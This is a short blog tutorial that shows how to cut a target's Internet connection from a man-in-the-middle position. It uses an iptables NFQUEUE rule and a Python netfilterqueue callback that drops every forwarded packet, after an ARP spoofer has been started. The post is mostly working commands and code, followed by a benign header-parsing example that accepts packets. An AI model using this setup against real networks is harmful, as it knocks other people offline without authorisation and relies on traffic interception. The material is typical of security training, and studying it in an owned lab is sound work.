Cut target Internet connection with Netfilterqueue

Hello friends, we are going to disable the Internet connection of our target using Python.
To do this, we receive the packets coming from the target and store them in a queue. Whenever we get a request we put it in the queue, where it is held instead of being forwarded. We can then use Python to modify the packet and send the request on to its destination. The same process can be applied to responses.
To create the queue we are going to use iptables:
    iptables -I FORWARD -j NFQUEUE --queue-num 0
-I: insert a rule into the chain that we want to modify. FORWARD: the chain where forwarded packets are placed by default.
-j: jump to a target, here NFQUEUE (Netfilter queue). Rule traversal stops there and the packet is handed to the queue.
--queue-num: the queue which we are going to use. It can be any number.
Install the netfilterqueue Python package:
    pip install netfilterqueue
Import netfilterqueue:
    import netfilterqueue
And create a NetfilterQueue object:
    queue = netfilterqueue.NetfilterQueue()
To bind a callback to the queue we are going to use the bind method.
QueueHandler.bind(queue_num, callback[, max_len[, mode[, range[, sock_len]]]])
Create and bind to the queue. queue_num must match the number in your iptables rule. callback is a function or method that takes one argument, a Packet object (see below). max_len sets the largest number of packets that can be in the queue; new packets are dropped if the size of the queue reaches this number. mode determines how much of the packet data is provided to your script. Use the constants above. range defines how many bytes of the packet you want to get. For example, if you only want the source and destination IPs of an IPv4 packet, range could be 20. sock_len sets the receive socket buffer size.
    queue.bind(0, drop_packet)
0: the queue number from the iptables command.
drop_packet: the function which we are going to create.
Run the queue:
    queue.run()
Now we need to implement the drop_packet function (in the script it must be defined before the queue.bind call):
    def drop_packet(packet):
        packet.drop()
All packets received from the target will be dropped, and the target will lose its Internet connection.
Once you are done, you need to clean up iptables:
    iptables --flush
Note that --flush removes every rule in the filter table, not only the one added above.
To make this script work, arp_spoofer needs to be started first.
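The bind documentation above notes that range could be 20 when only the IPv4 source and destination addresses are needed. As an added example (not code from the original post), the callback below parses that 20-byte header and always accepts the packet, so on a lab gateway you administer it shows what the queue delivers without interrupting traffic; parse_ipv4_header, observe and SAMPLE_HEADER are names and data constructed for this illustration.

```python
import ipaddress
import struct

IPV4_MIN_HEADER = 20  # bytes; the "range could be 20" case from the bind docs
# Constructed sample: 192.0.2.10 -> 198.51.100.7, TCP, TTL 64, total length 40
SAMPLE_HEADER = bytes.fromhex("450000280000000040060000c000020ac6336407")


def parse_ipv4_header(data):
    """Return the header fields as a dict, or None if data is not usable IPv4."""
    if len(data) < IPV4_MIN_HEADER:
        return None                      # truncated copy or runt packet
    (ver_ihl, _tos, total_len, _ident, _frag,
     ttl, proto, _cksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < IPV4_MIN_HEADER:
        return None                      # IPv6 or malformed header length
    return {
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "proto": proto, "ttl": ttl,
        "header_len": ihl, "total_len": total_len,
    }


def observe(packet, log=print):
    """Queue callback: log the header, then accept so traffic keeps flowing."""
    fields = None
    try:
        fields = parse_ipv4_header(packet.get_payload())
        log(fields if fields else "non-IPv4 or truncated packet")
    finally:
        packet.accept()                  # a verdict is issued on every path
    return fields


def main():
    import netfilterqueue                # needs root and the iptables rule
    queue = netfilterqueue.NetfilterQueue()
    # Copy only the first 20 bytes of each packet into user space.
    queue.bind(0, observe, mode=netfilterqueue.COPY_PACKET, range=IPV4_MIN_HEADER)
    try:
        queue.run()
    finally:
        queue.unbind()


if __name__ == "__main__":
    main()
```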
Check my blog — devopslife.xyz